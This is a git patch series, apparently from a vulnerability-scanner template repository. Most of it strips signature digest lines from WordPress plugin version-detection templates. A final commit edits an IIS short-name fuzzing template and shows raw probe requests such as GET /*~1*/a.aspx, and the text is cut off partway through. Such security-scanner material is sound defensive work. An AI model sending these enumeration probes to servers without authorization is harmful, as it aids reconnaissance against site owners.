b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b62daf113fecc88ec6b76fe0f2343d3980aff4ae1770d7cd9040bfa5ce6383d02203c46de2caf63278a99f422d9a312308ac349a9419656067024666a4f062e96f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index e188bb085b..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220423796077f7866de15930bc25e35d1834c1675ac72da75894d677cbb7b5fca200220489884313d24e308bc766789d48a99f37ebe274d620437ce2802b5e58498a9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 84cfdb92dd..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8839424132ce73202c4affcb8b99417c1f94e2db2b2bcd3b3a286fbf2bbab8d022100cbf5de1e09c26cb7646be16dabcb53de5c948d1276b428a64dfe27cad948638a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index e321fb10b4..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b308a2277ad053a9035a75ca030560f0ef03a5b42dede95175296a62f299e13022100d9bbac803d35edaf741236a6bb90a8963c47abb2b3c7c6b243e7ae8b1acb6512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 35e40bcea9..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070fc4a3fe1c0bcd75884572d206af0cd43ba1fd6f35e0501990cc72a6ce329b202201e7c141521a021dcddf900833fd27364ecb2a778268f5d9067aa66a2c82705ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 790ff3accd..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a7eac103e54a33bf3619af408d7a10ee506061eb51adc4f03e1e4fceb573b39022100d4b8137885e62ef4d249f61aec975509fba4ab77889a6efcbba11a4326dca921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 29db49d18d..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfb836965e834b46893949a85458f323719d837d4139ac2858898036ead0bd5502207777240409d5660a9d2b26c6e398e8f353db5031fef7d5c69db0c9a98c580b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index a620aa5f18..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043425dd78623cb573da34e092416d9c4283e9b619d1ea3cead77ac5969a9e3fb02202befb2757621c303d994322afbfc7577c92a09247e1c371c54bf69c6478602d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 13e3400a31..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0fc439af9d1a762bcb24b875f2f0cc6e22ff0b4bca456eb5690711d85d8ab80022100e0202d1a2ae41d6d09d4561bb73eba3c6b134b851a51addd169384db08a4c698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 84eea515e6..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207bb0f8d6009d9a1a4d4401be25b52c6516893c33f39eb4d768dddd78f53bb8e9022100e79d0eec39ab6623bfb620a030c255d0d5c2fbe0accd554598d8b55e44fa1667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a962d1376b..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5f7d6165b9ece57399498e3e3472d8613899288ad2e64adb0c83c62f3f2d001022022355530e7a2b6354975a1b0c663bd5156751c007eb003c9e6a00924bba27f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 809be488f5..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8f9e0a0fadd9ac46889390227292ba02ecbe597d53d18fa1f88397a608784e7022005c43050efe0b78888a2d413233700a7a5778b4cffc5fb374c905cfc28c4cffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index da6f3d6016..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9fb7ab29c61e5cb2354eac4b81bbabba383092edaa9cdf77591ece9ea79027502204d67328f8b4aff73025e236f96e9008d314eae61ffdf21d9aab00e6646b5ea0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 7a36d13dc8..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009f96691efd9ba09ddac8893710c814ad4a309d56834bf17824de0ac2560eecf02206d1377ca9adbb59c3bb7fbf89010383aaa11eec13e2ad361636f2b86ea63fea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1cc92e3650..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d0239541ac0137c196fdc654a61bac659cc876ebf7e8181f78860e9220bfba5702203d5e832380d5113e52c1a530a79b87e14eba9d4629b1c1410dcf35210526d587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 267453218f..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200775db4789159e050f4434b5047bb108e74c4bf0472b2a05506e5eb4a315f58c0220283f2ec5d3193e9d8eeceff0a996c9e1acd23cb80288e9388e0e160b8cc1c9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 53d0e74b25..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b1ec5e917af72b70d1afc1574b82b8c2eba9df7968a3de5ca24c056d316504e02201bf9691f97eab6aa86a620978063e49946fd06567cabef4759e3224ec2bf42f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 382137fe1b..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035f673700620b877594f83a98cf06ab95cb43b5b096abe831d7f8888e5e32a14022045e6b16f6b28066683115ddfa624be6684e831b308736ad3d96c1b53de0cd28c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 09730ce402..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220201e138c1ec5581e4e6cb5899349f56b89b33f34ebdfa1f4f9a3ca56e5351c2202204d8ade600699c59892843da9213440c03adf408dba81b663ddc2ce1594a0b2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 2585b241ad..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031c2612d9d6f39f0396e0f87d1c39f54d1205fac1b40bed212e2ab67a56c60a6022014f60a00055a63539d24006e167fce59b8c7dbc13dc1d6419c8bd3f8945397fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7b1fe38730..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059f4fdd0dab55b96f018d54d81596e4afde228dda1f0e85652b4dc4cf8ef2fbe022030ac9ed6d1ff46014141b58f3d585d951689598b5128372a5642b7b29fdf115b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index c6af7d4e38..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d236eb5968ddb506715903d4b9446f7275497719638170309f240736403a84302210086ee6a588f9d5c50b8d861c63e68f53ef3ce0bc8d89daaa55667305c3de8c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index e9527fa0e9..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e90dffa5327c6fe3c76a1183fc072a166e228776ae10fc6262114956bedf0b002203be51f76d27001c3745b6de40a137760c5d002555f2d06e61717db41ae74bf57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f2d4ed95fb..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8df321ad63d2980483c02c1f226775f57df79850db23d117241f84f6d72d515022100f8b609bf335a06e509df815107fe83bc9f216c76e38285356a591f0cabde7abb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 39d352d944..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077553fc0f35cf4f36a1000de9f965b794d0d9b55c2d9be092eb057b91032b53a022100d681962a31b99d847851016e5f25eb96e484867f5cef6c9a1e49e07f42b6459c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index b81fa316da..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c68aefd3801c9b9cd191c31d933bf9511643aa894807231324d345563139f9f102205e35a9b263bdf20d7dc5fa367f34548d440498b1018a30d7138da5400a52b87d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index e3b2267975..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205932a7a3f6c6f323187328623b108111b70fd2340e997443d130344658b343d90221008202278d6d42219dbc9d57e6adc1bb9d9451a7d3d780434e955f6a6ceca214a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e756a57938..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206623540bbcbc63e5cb996efd004adfeeff127c75195aeb646141aeadd18a06ac02202f471bdd75f19d2a0bd04c3b8704211ac4355ce50b3daf9c78a1c9dcb6eecb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 0fed5799a9..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c4092f6cfc305aeb53730d9e9a25dd6df135d7f913ccf74c05eb7535398e92c002204bd652e5ac62fc0d3023a81093599add81d14f53c3a1c97b7711a8bfec3cfef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index fe9e5f1b26..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df31fbe5717696c01866dc4917affce286609c907ba783b0ef2a2b96c745491102205cd240c73fcf7ef5a39f328f7f95bbc4eb92a19d2eead2cfa3eaeb888481a80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 5e4c0f3ca6..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210096c85d6f9e277368ead68c2f0757d84091e2019197100eae001719cefd88cffb022100fac4ffbd52dbf02f155f717b4c78accf9b3b9fc0527e5a99282f13a767c89e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index a4ee11efef..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220650f8cea974d8b2e352a666a3e80626ddf8e452448a0790de672285f7e4d0b91022100c6eda07092e96a1ac6286299950c6a388a2d2cdd85cad87fcc3ff79a97fecbb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 0b2b7f0231..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100deb377984fd2b3ab9d27c28cb8a070d0ce275763fe901bb55b231a01fa3117c2022100a89391ba79403cb5d4083f2ef4d6618c038fdadedfdce568dc66f02b5ab77c41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 92442865d4..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f170af963b74277e46c3da5ba91fc83edcbf468c9498157c49e954f875662c720220618eab9f7680929c3b1ee51c1f8ad12517b64125c0436595dc728f34198c4f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index a08b767629..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203934cca505b09c9bddbf78af4089aec5d025137a4d0d456eb7eb11563b12d257022100cd98223af3138e6b0a1bb9c8a4ca03dfd34c0863e1953f17bc63f855f1e5668a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 2f2812e964..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100815241f8421040a127bbdb3259fce90cfd87c46eec6bc4763f27a7d3d6aa713e022100ea786efd10cfeb0d9ec1b7cfdb78f494046b58bbd9442415627899e23a103442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 9120ceb7ec..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ba536d064a4552f875d397b0708b9843805e7ef2daa313c6d835b05a69a747b0221008b01bd691c4f3d2e317c37e5c689814ca3b2f1868b75b1f3f28ef18378864bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index be4ed15599..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9cdd9a9270855ee166f1596b4b40f27800a6a9f4174216f83710fa4128e1bba022025c69b96e7007a78b3b6430d664ea921d55facc916f5e68a4ecd99c7fc966846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 841be88d9d..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d4ee1325ba19b866f722bc054eb6bfc7924d5fea84a3bcd2d1bdbbfdc561eff0220469c3933f131fdfcbe09378ebcaceea0e4601b4bc57c108098ca346e44b0470d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index f1d5acc0d9..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039093043ab26441048b6b08994a650132e636b5a6a786c78fd796e631ae219a302210098cb0089292fdbdb87fbf3d01b73e194df76c4ffb98bdfe6a730437b6177caa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 5233960732..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220257fc3408cd037efa40f3965f70e07db7f4d2d80e7824a0905c6c69bc02f93a9022100813e17873e26f7b7100e2958036e149270d2722053cdcf229a8665522d91c35b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 820567bd84..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdc176d18cfadc4ebdd03c96a2b2c896ba279b199c5fc5787ee65838289b5a8a02210081d9120859bb079fb9a5cde415bacf47eddc8a091b2a35efb5930726f2d29e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 6599e51b5b..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100887d497d3671535f30d43ff739fdd40c15acaedd878b27ee997bafee13c79811022100a3177032c93553fd1e11825ec7a9194e1610e9b51f0d2c1d2ac6d720a59f2c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index b0d3fd2d9a..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df72f793ea66e6994fa7b7c697bd5bde4b8d628eacb5e3a1f5490e418ce76bb30221008eeaf54a1ab709e9880f169789858d5cfb0133ba46fca489decc5b0b7aa3ddc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index db4ea9e87d..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203aa42be8215e7ba48b01d278798d1dda57df3238e6f3fafa54a4177dd5f06be2022039c61d93d8c9822f02d7a73fed1d57f3e8e0dd30ba57ab558bafcb4ca46a13a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6ed710c85842def826934c76d2d0cdcc0a012328 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 17 Jul 2024 08:33:22 +0700 Subject: [PATCH 1317/1841] feat: fp on iis-shortname.yaml --- http/fuzzing/iis-shortname.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index bc01786c77..4eeddded2c 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -25,7 +25,7 @@ http: Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | - GET /*~1*/a.aspx' HTTP/1.1 + GET /*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 @@ -35,7 +35,7 @@ http: Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - | - OPTIONS /*~1*/a.aspx' 